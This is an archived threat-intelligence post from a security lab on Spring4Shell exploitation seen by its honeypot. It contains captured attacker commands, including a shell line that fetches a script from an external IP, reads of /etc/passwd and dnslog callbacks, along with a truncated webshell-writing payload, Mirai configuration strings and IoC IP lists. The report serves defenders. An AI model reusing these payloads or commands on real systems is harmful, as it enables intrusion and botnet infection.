{
	"id": "1dd6a804-4f1c-4da1-91db-ca0189dd3456",
	"created_at": "2026-04-06T00:17:36.364179Z",
	"updated_at": "2026-04-10T03:32:46.14448Z",
	"deleted_at": null,
	"sha1_hash": "b283b9e2cc26be470bb2f38271e8cf006184c28c",
	"title": "What Our Honeypot Sees Just One Day After The Spring4Shell Advisory",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 860941,
	"plain_text": "What Our Honeypot Sees Just One Day After The Spring4Shell\r\nAdvisory\r\nBy houliuyang\r\nPublished: 2022-04-01 · Archived: 2026-04-05 16:02:30 UTC\r\nBackground\r\nOn March 31, 2022, Spring issued a security advisory[1] for the Spring4Shell vulnerability (CVE-2022-22965),\r\nthis vulnerability has caused widespread concern in the security community.\r\nWhen we looked back at our data, our threat hunting honeypot System[2] had already captured activities related to\r\nthis exact vulnerability. After March 30, we started to see more attempts such as various webshells, and today,\r\n2022-04-01 11:33:09(GMT+8), less than one day after the vendor released the advisory, a variant of Mirai, has\r\nwon the race as the first botnet that adopted this vulnerability.\r\nSpring4Shell in the wild propagation\r\nOur honeypot system started to observe scans related to the Spring4Shell vulnerability (CVE-2022-22965), the\r\nfollowing diagram shows the geographic distribution of the scanner IP addresses that we have seen so far.\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 1 of 18\n\nTop 10 country statistics\r\nUnited States 92\r\nThe Netherlands 49\r\nGermany 30\r\nChina 21\r\nFrance 6\r\nLuxembourg 6\r\nSweden 6\r\nSwitzerland 5\r\nUkraine 5\r\nAustria 4\r\nWe haven seen a large number of Webshell and test file upload behavior, the corresponding file information is\r\nshown below.\r\nSome of the exploits that we have observed so far:\r\necho%20ddfdsfasdfasd\r\necho%20fdsafasdfasd\r\necho%202222222\r\nls\r\nls%20/tmp/\r\nwhoami\r\n%2Fbin%2Fsh%2F-c%24%7BIFS%7D%27cd%24%7BIFS%7D%2Ftmp%3Bwget%24%7BIFS%7Dhttp%3A%2F%2F107.174.133.167%2Ft.sh%24%7BI\r\ncat+/etc/passwd\r\nchdir\r\ncmd /c dir\r\ncmd /c net user\r\ncurl+http://111.4vcrkb.dnslog.cn/1.jpg\r\ncurl+http://12121.4vcrkb.dnslog.cn/1.jpg\r\ncurl+http://35456.4vcrkb.dnslog.cn/1.jpg\r\ndir\r\necho\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 2 of 18\n\necho 8888888888\r\necho %USERNAME%\r\necho %computername%\r\necho \u003c/xss\u003e\r\necho fucker_test_test\r\necho rinima\r\necho%20%3Csvg%20onload=confirm`xss`%3E\r\necho%20%3Csvg%20onload=confirm`xsssssss`%3E\r\necho%20ddfdsfasdfasd\r\necho%20fdsafasdfasd\r\necho%202222222\r\necho+22222\r\necho+`whoami`\r\necho+whoami\r\nexp\r\nid\r\nifconfig\r\nls\r\nls%20/tmp/\r\nping -n 2 uup0fk.dnslog.cn\r\nping uup0fk.dnslog.cn\r\nuname\r\nwhoami\r\nwhoami%0A\r\nSpring4Shell Vulnerability brief\r\nSpring4Shell vulnerability (CVE-2022-22965) is caused by the new module feature in JDK version 9 and above,\r\nand is a bypass for the CVE-2010-1622 vulnerability patch.\r\nJava Beans\r\nJava introspection manipulates JavaBean properties through reflection, the JDK provides the PropertyDescription\r\nclass operation to access JavaBean properties, when operating on multiple properties, you can operate on all\r\nproperties by traversing the property description object array.\r\nThrough the class Introspector to get the BeanInfo information of an object, and then the BeanInfo to get the\r\nproperty descriptor PropertyDescriptor, the property descriptor can get the getter/setter methods corresponding to\r\na property, and then through the reflection mechanism to call these methods.\r\nFor example, through the PropertyDescriptor[] assignment.\r\nIf the parent class properties is not needed, the second parameter of getBeanInfo Class beanClass, Class\r\nstopClass) is there, calling BeanInfo getBeanInfo(Class beanClass) directly, PropertyDescriptor[] will contain the\r\nparent class Object.class.\r\nCVE-2010-1622 Vulnerability brief\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 3 of 18\n\nCVE-2010-1622 vulnerability exists because \"CachedIntrospectionResults class\"of Spring Beans does not specify\r\nthe stop class when calling java.beans.Introspector.getBeanInfo() enumeration property assignment, resulting in\r\nthe parent class ( Object.class is the parent class of any java object) class property can be maliciously controlled\r\nby an attacker.\r\nSpring parameter supports the user to submit a form in the form of parameters = value object assignment, while\r\nuser.address.street = Disclosure + Str is equivalent to frmObj.getUser().getAddress().setStreet(\"Disclosure Str.\").\r\nSo a value can be assigned to the first class property in PropertyDescriptor[] by means of\r\nuser.address.street=Disclosure+Str. If the class property is controlled through the classLoader, the exploit chain\r\ncan be constructed.\r\nVulnerability Patch\r\nSpring patches the vulnerability by adding the classLoader to the property array blacklist.\r\nCVE-2022-22965 Vulnerability brief\r\nSimilar to the CVE-2010-1622 vulnerability, another class parameter related issue.\r\nCVE-2022-22965 is a bypass of patch CVE-2010-1622, in JDK11+Tomcat8.5.77+spring-webmvc5.3.17 version,\r\nwe noticed that class.module.classLoader.* can load ParallelWebappClassLoader to bypass the detection of\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 4 of 18\n\nclassLoader:\r\nExploit Payload that we saw\r\nclass.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(reque\r\nHere the pattern specifies the format of the log record, suffix specifies the log record suffix as .jsp, directory\r\nspecifies the directory webapps/ROOT where the log is saved, prefix specifies the file name tomcatwar,\r\nfileDateFormat specifies the date format of the log file name. The whole payload uses Tomcat’s class\r\nAbstractAccessLogValve to modify the log storage format, directory and file name, so the webshell can be\r\nuploaded.\r\nVulnerability Patch\r\nA strict blacklist restrictions have been added\r\nMirai botnet\r\nAs mentioned above, Mirai botnet has jumped on the wagon and the following is the relevant configuration\r\ninformation that has been decrypted.\r\n [0x01]: \"46.175.146.159\\x00\", size=15\r\n [0x02]: \"A\\x84\", size=2\r\n [0x03]: \"D\\xfd\", size=2\r\n [0x04]: \"U better back the fuck off CIANigger \u003e\u003e\u003e---\u003c3--\u003e\\x00\", size=49\r\n [0x05]: \"shell\\x00\", size=6\r\n [0x06]: \"enable\\x00\", size=7\r\n [0x07]: \"system\\x00\", size=7\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 5 of 18\n\n[0x08]: \"sh\\x00\", size=3\r\n [0x09]: \"/bin/busybox DEMONS\\x00\", size=20\r\n [0x0a]: \"DEMONS: applet not found\\x00\", size=25\r\n [0x0b]: \"ncorrect\\x00\", size=9\r\n [0x0c]: \"/bin/busybox ps\\x00\", size=16\r\n [0x0d]: \"assword\\x00\", size=8\r\n [0x0e]: \"ogin\\x00\", size=5\r\n [0x0f]: \"enter\\x00\", size=6\r\n [0x10]: \"/proc/\\x00\", size=7\r\n [0x11]: \"/exe\\x00\", size=5\r\n [0x12]: \"/fd\\x00\", size=4\r\n [0x13]: \"/maps\\x00\", size=6\r\n [0x14]: \"/proc/net/tcp\\x00\", size=14\r\n [0x15]: \"/etc/resolv.conf\\x00\", size=17\r\n [0x16]: \"nameserver\\x00\", size=11\r\n [0x17]: \"Pully\\x13SHD\\x1aiIGK\\x1cDig\\x13\\x18}Bfpc]MkGp^b\\x12[}P\\x1b\\\\~m`b`^rc\\x13Xeg\\x13G\\x1a\\x12z*\", size=57\r\n [0x18]: \"i586\\x00\", size=5\r\n [0x19]: \"i486\\x00\", size=5\r\n [0x1a]: \"x86\\x00\", size=4\r\n [0x1b]: \"i686\\x00\", size=5\r\n [0x1c]: \"mips\\x00\", size=5\r\n [0x1d]: \"mipsel\\x00\", size=7\r\n [0x1e]: \"mpsl\\x00\", size=5\r\n [0x1f]: \"sh4\\x00\", size=4\r\n [0x20]: \"superh\\x00\", size=7\r\n [0x21]: \"ppc\\x00\", size=4\r\n [0x22]: \"powerpc\\x00\", size=8\r\n [0x23]: \"spc\\x00\", size=4\r\n [0x24]: \"sparc\\x00\", size=6\r\n [0x25]: \"(deleted)\\x00\", size=10\r\n [0x26]: \"abcdefghijklmnopqrstuvwxyz\\x00\", size=27\r\n [0x27]: \"%d.%d.%d.%d\\x00\", size=12\r\n [0x28]: \"POST /cdn-cgi/\\x00\", size=15\r\n [0x29]: \"UPX!\\x00\", size=5\r\n [0x2a]: \"botnet\\x00\", size=7\r\n [0x2b]: \"ddos\\x00\", size=5\r\n [0x2c]: \"oginenterassword\\x00\", size=17\r\n [0x2d]: \"GET/ HTTP/1.1\\x00\", size=15\r\n [0x2e]: \"garm\\x00\", size=5\r\n [0x2f]: \"gx86\\x00\", size=5\r\n [0x30]: \"gmips\\x00\", size=6\r\n [0x31]: \"gmpsl\\x00\", size=6\r\n [0x32]: \"gsh4\\x00\", size=5\r\n [0x33]: \"gspc\\x00\", size=5\r\n [0x34]: \"gppc\\x00\", size=5\r\n [0x35]: \"gsec\\x00\", size=5\r\n [0x36]: \".glm\\x00\", size=5\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 6 of 18\n\n[0x37]: \"cronx86\\x00\", size=8\r\n [0x38]: \"cronarm\\x00\", size=8\r\n [0x39]: \"cronmips\\x00\", size=9\r\n [0x3a]: \"cronmpsl\\x00\", size=9\r\n [0x3b]: \"cronsh4\\x00\", size=8\r\n [0x3c]: \"cronspc\\x00\", size=8\r\n [0x3d]: \"cronppc\\x00\", size=8\r\n [0x3e]: \"cronsh\\x00\", size=7\r\n [0x3f]: \"gi686\\x00\", size=6\r\n [0x40]: \"/dev/watchdog\\x00\", size=14\r\n [0x41]: \"/dev/misc/watchdog\\x00\", size=19\r\n [0x42]: \"/dev/FTWDT101_watchdog\\x00\", size=23\r\n [0x43]: \"/dev/FTWDT101 watchdog\\x00\\x12\", size=24\r\n [0x44]: \"/dev/watchdog0\\x00\", size=15\r\n [0x45]: \"/etc/default/watchdog\\x00\", size=22\r\n [0x46]: \"/sbin/watchdog\\x00\", size=15\r\nSome Webshell and test files that we have seen so far\r\nfilepath count\r\n/tmp/log222.txt 3973\r\nwebapps/ROOT/log111.txt 2051\r\nwebapps/ROOT/tomcatwar.jsp 110\r\nwebapps/ROOT/wpz.jsp 27\r\n/../webapps/ROOT/logout.jsp 12\r\n./webapps/ROOT/test2%20%20.txt 9\r\nwebapps/ROOT/log101.txt 7\r\n/log_data_9.jsp 3\r\nwebapps/ROOT/xiaozhan.jsp 3\r\nwebapps/ROOT/1122.jsp 3\r\nwebapps/ROOT/0985763860781234.jsp 3\r\n/2023.jsp 3\r\nwebapps/ROOT/zhuzhuxias.jsp 3\r\nwebapps/ROOT/log147.txt 2\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 7 of 18\n\nfilepath count\r\nwebapps/ROOT/aaa69875.jsp 1\r\nwebapps/ROOT/log186.txt 1\r\nwebapps/ROOT/aaa36917.jsp 1\r\nwebapps/ROOT/member3war.jsp 1\r\nwebapps/ROOT/aaa96225.jsp 1\r\nwebapps/ROOT/log154.txt 1\r\nwebapps/ROOT/log103.txt 1\r\nwebapps/ROOT/log176.txt 1\r\nwebapps/ROOT/7FMNZ.jsp 1\r\nwebapps/ROOT/aaa28643.jsp 1\r\nwebapps/ROOT/aaa49231.jsp 1\r\nwebapps/ROOT/aaa50586.jsp 1\r\nwebapps/ROOT/log112.txt 1\r\nwebapps/ROOT/log110.txt 1\r\nwebapps/ROOT/aaa80751.jsp 1\r\n/2021.jsp 1\r\nwebapps/ROOT/aaa10854.jsp 1\r\nwebapps/ROOT/log105.txt 1\r\nwebapps/ROOT/aaa93089.jsp 1\r\nwebapps/ROOT/35456.jsp 1\r\nwebapps/ROOT/log182.txt 1\r\nwebapps/ROOT/aaa24348.jsp 1\r\nwebapps/ROOT/log131.txt 1\r\nwebapps/ROOT/indexbk.jsp 1\r\nwebapps/ROOT/log149.txt 1\r\nwebapps/ROOT/log179.txt 1\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 8 of 18\n\nfilepath count\r\nwebapps/webappsbak/sxxd1648765386.txt 1\r\nwebapps/ROOT/log150.txt 1\r\nWebapps/ROOT/78754.jsp 1\r\nwebapps/ROOT/aaa24168.jsp 1\r\nwebapps/ROOT/aaa10487.jsp 1\r\nwebapps/ROOT/log178.txt 1\r\nwebapps/ROOT/lapsus 1\r\nwebapps/ROOT/zhuzhuxia.jsp 1\r\nwebapps/ROOT/log135.txt 1\r\nwebapps/ROOT/aaa40373.jsp 1\r\nwebapps/ROOT/qweasd.jsp 1\r\nwebapps/ROOT/console.jsp 1\r\nwebapps/ROOT/aaa79694.jsp 1\r\nwebapps/ROOT/aaa54378.jsp 1\r\nwebapps/ROOT/log129.txt 1\r\nwebapps/ROOT/pCJrI.jsp 1\r\nwebapps/ROOT/log162.txt 1\r\nWebapps/ROOT/7875456457.jsp 1\r\nwebapps/ROOT/.jsp 1\r\nwebapps/ROOT/log200.txt 1\r\nwebapps/ROOT/8888888888.jsp 1\r\nwebapps/ROOT/8888888888.txt 1\r\nwebapps/ROOT/log128.txt 1\r\nwebapps/ROOT/log124.txt 1\r\nwebapps/ROOT/aaa14058.jsp 1\r\nwebapps/ROOT/aaa94175.jsp 1\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 9 of 18\n\nfilepath count\r\nwebapps/ROOT/conf.jsp 1\r\nwebapps/stupidRumor_war/tomcatwar.jsp 1\r\nwebapps/ROOT/aaa83816.jsp 1\r\nRecommendations\r\nSpring users should follow the vendor’s advisory, as the same time, users can check their systems for the\r\naforementioned Webshell and test files paths for possible breach.\r\nContact us\r\nReaders are always welcomed to reach us on twitter or email us at netlab at 360 dot cn .\r\nIoC List\r\nMirai C2\r\n46.175.146.159:16772\r\nIP\r\n1.85.220.54 China AS4134 CHINANET-BACKBONE\r\n3.239.1.141 United States AS14618 AMAZON-AES\r\n5.2.69.50 The Netherlands AS60404 Liteserver\r\n14.0.170.249 China AS38819 HKCSL-AS-AP\r\n23.128.248.10 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.11 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.12 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.13 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.14 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.15 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.16 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.17 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.19 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.20 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.21 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.22 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.23 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.24 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.25 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.27 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.28 United States AS398355 DATAIDEAS-LLC\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 10 of 18\n\n23.128.248.29 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.33 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.34 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.38 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.39 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.40 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.41 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.42 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.43 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.44 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.46 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.48 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.50 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.51 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.53 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.54 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.55 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.56 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.57 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.58 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.59 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.60 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.61 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.62 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.63 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.64 United States AS398355 DATAIDEAS-LLC\r\n23.128.248.65 United States AS398355 DATAIDEAS-LLC\r\n23.129.64.130 United States AS396507 EMERALD-ONION\r\n23.129.64.131 United States AS396507 EMERALD-ONION\r\n23.129.64.132 United States AS396507 EMERALD-ONION\r\n23.129.64.133 United States AS396507 EMERALD-ONION\r\n23.129.64.134 United States AS396507 EMERALD-ONION\r\n23.129.64.135 United States AS396507 EMERALD-ONION\r\n23.129.64.136 United States AS396507 EMERALD-ONION\r\n23.129.64.137 United States AS396507 EMERALD-ONION\r\n23.129.64.138 United States AS396507 EMERALD-ONION\r\n23.129.64.139 United States AS396507 EMERALD-ONION\r\n23.129.64.140 United States AS396507 EMERALD-ONION\r\n23.129.64.141 United States AS396507 EMERALD-ONION\r\n23.129.64.142 United States AS396507 EMERALD-ONION\r\n23.129.64.143 United States AS396507 EMERALD-ONION\r\n23.129.64.145 United States AS396507 EMERALD-ONION\r\n23.129.64.146 United States AS396507 EMERALD-ONION\r\n23.129.64.147 United States AS396507 EMERALD-ONION\r\n23.129.64.148 United States AS396507 EMERALD-ONION\r\n23.129.64.149 United States AS396507 EMERALD-ONION\r\n23.129.64.210 United States AS396507 EMERALD-ONION\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 11 of 18\n\n23.129.64.211 United States AS396507 EMERALD-ONION\r\n23.129.64.212 United States AS396507 EMERALD-ONION\r\n23.129.64.213 United States AS396507 EMERALD-ONION\r\n23.129.64.214 United States AS396507 EMERALD-ONION\r\n23.129.64.215 United States AS396507 EMERALD-ONION\r\n23.129.64.216 United States AS396507 EMERALD-ONION\r\n23.129.64.217 United States AS396507 EMERALD-ONION\r\n23.129.64.218 United States AS396507 EMERALD-ONION\r\n23.129.64.219 United States AS396507 EMERALD-ONION\r\n23.129.64.250 United States AS396507 EMERALD-ONION\r\n23.154.177.6 United States AS399532 ULAYER-ASN\r\n23.154.177.7 United States AS399532 ULAYER-ASN\r\n23.239.21.195 United States AS63949 LINODE-AP\r\n27.102.106.117 South Korea AS45996 GNJ-AS-KR\r\n37.187.18.212 France AS16276 OVH\r\n37.187.96.183 France AS16276 OVH\r\n43.128.201.239 Thailand AS132203 TENCENT-NET-AP-CN\r\n43.242.116.54 India AS45916 GTPL-AS-AP\r\n45.15.16.105 Sweden AS42675 OBEHOSTING\r\n45.32.251.86 Japan AS20473 AS-CHOOPA\r\n45.33.101.246 United States AS63949 LINODE-AP\r\n45.61.186.160 United States AS53667 PONYNET\r\n45.78.48.51 Japan AS25820 IT7NET\r\n45.128.133.242 Belgium AS206804 EstNOC-GLOBAL\r\n45.129.56.200 Denmark AS39351 ESAB-AS\r\n45.136.15.239 China AS139659 LUCID-AS-AP\r\n45.153.160.2 The Netherlands AS212906 moneroj-ca\r\n45.153.160.132 The Netherlands AS212906 moneroj-ca\r\n45.153.160.136 The Netherlands AS212906 moneroj-ca\r\n45.154.255.138 Sweden AS41281 KEFF\r\n45.154.255.139 Sweden AS41281 KEFF\r\n45.154.255.147 Sweden AS41281 KEFF\r\n46.166.139.111 The Netherlands AS43350 NFORCE\r\n46.175.146.159 The Netherlands AS50673 Serverius-as\r\n46.232.251.191 Germany AS197540 netcup-AS\r\n51.15.76.60 The Netherlands AS12876 AS12876\r\n51.77.52.216 Poland AS16276 OVH\r\n58.82.211.226 China AS137872 PEOPLESPHONE-HK\r\n58.240.81.135 China AS4837 CHINA169-Backbone\r\n60.248.106.229 China AS3462 HINET\r\n62.102.148.68 Sweden AS51815 TEKNIKBYRAN\r\n62.102.148.69 Sweden AS51815 TEKNIKBYRAN\r\n64.113.32.29 United States AS15154 SBBSNET\r\n66.220.242.222 United States AS17356 VERMONT-TELE\r\n74.82.47.194 United States AS6939 HURRICANE\r\n81.17.18.59 Switzerland AS51852 PLI-AS\r\n81.17.18.62 Switzerland AS51852 PLI-AS\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 12 of 18\n\n85.93.218.204 Luxembourg AS9008 ASN-VO\r\n85.204.116.204 Romania AS48874 HOSTMAZE\r\n87.120.37.231 Bulgaria AS34224 NETERRA-AS\r\n89.58.27.84 Germany AS197540 netcup GmbH\r\n89.163.131.159 Germany AS24961 MYLOC-AS\r\n89.163.131.160 Germany AS24961 MYLOC-AS\r\n91.132.147.168 Germany AS197540 netcup-AS\r\n91.149.225.172 Norway AS58110 IPVOLUME\r\n91.211.89.43 Ukraine AS206638 hostfory\r\n91.211.89.107 Ukraine AS206638 hostfory\r\n91.211.89.207 Ukraine AS206638 hostfory\r\n91.250.242.12 Romania AS6718 NAV\r\n92.246.84.133 Germany AS44592 SkyLink\r\n93.95.226.212 Iceland AS44925 THE-1984-AS\r\n93.174.89.132 The Netherlands AS202425 INT-NETWORK\r\n93.179.115.27 United States AS25820 IT7NET\r\n94.140.114.210 Latvia AS43513 NANO-AS\r\n101.37.159.147 China AS37963 CNNIC-ALIBABA-CN-NET-AP\r\n103.27.108.196 China AS132883 TOPWAY-AS-AP\r\n103.42.196.135 India AS138754 KVBPL-AS-IN\r\n103.42.196.203 India AS138754 KVBPL-AS-IN\r\n103.108.193.24 China AS139021 WEST263GO-HK\r\n103.140.186.68 Singapore AS206804 EstNOC-GLOBAL\r\n103.140.186.72 Singapore AS206804 EstNOC-GLOBAL\r\n103.140.186.73 Singapore AS206804 EstNOC-GLOBAL\r\n103.214.146.5 China AS135330 ADCDATACOM-AS-AP\r\n103.253.41.98 China AS133398 TELE-AS\r\n104.244.72.115 Luxembourg AS53667 PONYNET\r\n104.244.76.13 Luxembourg AS53667 PONYNET\r\n104.244.76.44 Luxembourg AS53667 PONYNET\r\n104.244.76.170 Luxembourg AS53667 PONYNET\r\n104.244.77.101 Luxembourg AS53667 PONYNET\r\n107.189.5.249 Luxembourg AS53667 PONYNET\r\n109.70.100.19 Austria AS208323 APPLIEDPRIVACY-AS\r\n109.70.100.31 Austria AS208323 APPLIEDPRIVACY-AS\r\n109.70.100.82 Austria AS208323 APPLIEDPRIVACY-AS\r\n109.70.100.84 Austria AS208323 APPLIEDPRIVACY-AS\r\n109.201.133.100 The Netherlands AS43350 NFORCE\r\n111.252.183.41 China AS3462 HINET\r\n111.252.198.28 China AS3462 HINET\r\n112.5.154.7 China AS9808 CMNET-GD\r\n112.36.205.252 China AS24444 CMNET-V4shandong-AS-AP\r\n112.169.175.24 South Korea AS131477 SHHJ-AS\r\n119.86.148.176 China AS4134 CHINANET-BACKBONE\r\n124.222.23.106 China AS45090 CNNIC-TENCENT-NET-AP\r\n128.31.0.13 United States AS3 MIT-GATEWAYS\r\n141.164.43.95 South Korea AS20473 AS-CHOOPA\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 13 of 18\n\n142.4.206.84 Canada AS16276 OVH\r\n143.198.131.158 United States AS14061 DIGITALOCEAN-ASN\r\n144.172.73.66 United States AS212513 STELZL-AS\r\n144.202.116.138 United States AS20473 AS-CHOOPA\r\n144.217.86.109 Canada AS16276 OVH\r\n146.19.174.33 China AS147293 NEAROUTE-AS-AP\r\n146.59.233.33 France AS16276 OVH\r\n151.80.148.159 France AS16276 OVH\r\n159.223.73.101 Singapore AS14061 DIGITALOCEAN-ASN\r\n162.247.74.7 United States AS4224 CALYX-AS\r\n164.92.65.110 United States AS14061 DIGITALOCEAN-ASN\r\n164.132.9.199 France AS16276 OVH\r\n166.70.207.2 United States AS6315 XMISSION\r\n167.71.238.228 India AS14061 DIGITALOCEAN-ASN\r\n167.99.76.46 Singapore AS14061 DIGITALOCEAN-ASN\r\n168.62.22.238 United States AS8075 MICROSOFT-CORP-MSN-AS-BLOCK\r\n171.25.193.20 Germany AS198093 DFRI-AS\r\n171.25.193.25 Germany AS198093 DFRI-AS\r\n171.25.193.77 Germany AS198093 DFRI-AS\r\n171.25.193.78 Germany AS198093 DFRI-AS\r\n172.104.93.152 Japan AS63949 LINODE-AP\r\n172.104.140.107 Germany AS63949 LINODE-AP\r\n172.104.159.48 Germany AS63949 LINODE-AP\r\n172.107.241.110 United States AS40676 AS40676\r\n172.245.89.109 United States AS36352 AS-COLOCROSSING\r\n175.178.154.77 China AS45090 CNNIC-TENCENT-NET-AP\r\n178.17.170.135 Moldova AS43289 TRABIA\r\n178.17.171.102 Moldova AS43289 TRABIA\r\n178.17.174.14 Moldova AS43289 TRABIA\r\n178.20.55.18 France AS29075 IELO\r\n182.255.45.211 China AS6134 XNNET\r\n185.34.33.2 France AS28855 OCTOPUCE-AS\r\n185.36.81.95 Lithuania AS133398 TELE-AS\r\n185.38.175.130 Denmark AS205235 LABITAT\r\n185.38.175.131 Denmark AS205235 LABITAT\r\n185.56.80.65 The Netherlands AS43350 NFORCE\r\n185.82.126.13 Latvia AS52173 MAKONIX\r\n185.83.214.69 Portugal AS58110 IPVOLUME\r\n185.100.86.74 Finland AS200651 FlokiNET\r\n185.100.86.128 Finland AS200651 FlokiNET\r\n185.100.87.41 Romania AS200651 FlokiNET\r\n185.100.87.133 Romania AS200651 FlokiNET\r\n185.100.87.174 Romania AS200651 FlokiNET\r\n185.100.87.202 Romania AS200651 FlokiNET\r\n185.105.90.134 Russia AS205090 FIRST-SERVER-EUROPE\r\n185.107.47.171 The Netherlands AS43350 NFORCE\r\n185.107.47.215 The Netherlands AS43350 NFORCE\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 14 of 18\n\n185.107.70.56 The Netherlands AS43350 NFORCE\r\n185.112.147.12 Iceland AS44925 THE-1984-AS\r\n185.129.62.62 Denmark AS57860 ZENCURITY-NET\r\n185.163.119.0 Germany AS197540 netcup-AS\r\n185.165.171.40 Romania AS200651 FlokiNET\r\n185.165.171.84 Romania AS200651 FlokiNET\r\n185.170.114.25 Germany AS197540 netcup-AS\r\n185.174.101.214 United States AS8100 ASN-QUADRANET-GLOBAL\r\n185.220.100.240 Germany AS205100 F3NETZE\r\n185.220.100.241 Germany AS205100 F3NETZE\r\n185.220.100.242 Germany AS205100 F3NETZE\r\n185.220.100.243 Germany AS205100 F3NETZE\r\n185.220.100.244 Germany AS205100 F3NETZE\r\n185.220.100.245 Germany AS205100 F3NETZE\r\n185.220.100.246 Germany AS205100 F3NETZE\r\n185.220.100.247 Germany AS205100 F3NETZE\r\n185.220.100.248 Germany AS205100 F3NETZE\r\n185.220.100.249 Germany AS205100 F3NETZE\r\n185.220.100.250 Germany AS205100 F3NETZE\r\n185.220.100.251 Germany AS205100 F3NETZE\r\n185.220.100.252 Germany AS205100 F3NETZE\r\n185.220.100.253 Germany AS205100 F3NETZE\r\n185.220.100.254 Germany AS205100 F3NETZE\r\n185.220.100.255 Germany AS205100 F3NETZE\r\n185.220.101.6 The Netherlands AS208294 RELAYON\r\n185.220.101.22 The Netherlands AS208294 RELAYON\r\n185.220.101.32 The Netherlands AS208294 RELAYON\r\n185.220.101.33 The Netherlands AS208294 RELAYON\r\n185.220.101.34 The Netherlands AS208294 RELAYON\r\n185.220.101.35 The Netherlands AS208294 RELAYON\r\n185.220.101.36 The Netherlands AS208294 RELAYON\r\n185.220.101.37 The Netherlands AS208294 RELAYON\r\n185.220.101.38 The Netherlands AS208294 RELAYON\r\n185.220.101.39 The Netherlands AS208294 RELAYON\r\n185.220.101.40 The Netherlands AS208294 RELAYON\r\n185.220.101.41 The Netherlands AS208294 RELAYON\r\n185.220.101.42 The Netherlands AS208294 RELAYON\r\n185.220.101.43 The Netherlands AS208294 RELAYON\r\n185.220.101.44 The Netherlands AS208294 RELAYON\r\n185.220.101.45 The Netherlands AS208294 RELAYON\r\n185.220.101.46 The Netherlands AS208294 RELAYON\r\n185.220.101.47 The Netherlands AS208294 RELAYON\r\n185.220.101.48 The Netherlands AS208294 RELAYON\r\n185.220.101.49 The Netherlands AS208294 RELAYON\r\n185.220.101.50 The Netherlands AS208294 RELAYON\r\n185.220.101.51 The Netherlands AS208294 RELAYON\r\n185.220.101.52 The Netherlands AS208294 RELAYON\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 15 of 18\n\n185.220.101.53 The Netherlands AS208294 RELAYON\r\n185.220.101.54 The Netherlands AS208294 RELAYON\r\n185.220.101.55 The Netherlands AS208294 RELAYON\r\n185.220.101.56 The Netherlands AS208294 RELAYON\r\n185.220.101.57 The Netherlands AS208294 RELAYON\r\n185.220.101.58 The Netherlands AS208294 RELAYON\r\n185.220.101.59 The Netherlands AS208294 RELAYON\r\n185.220.101.60 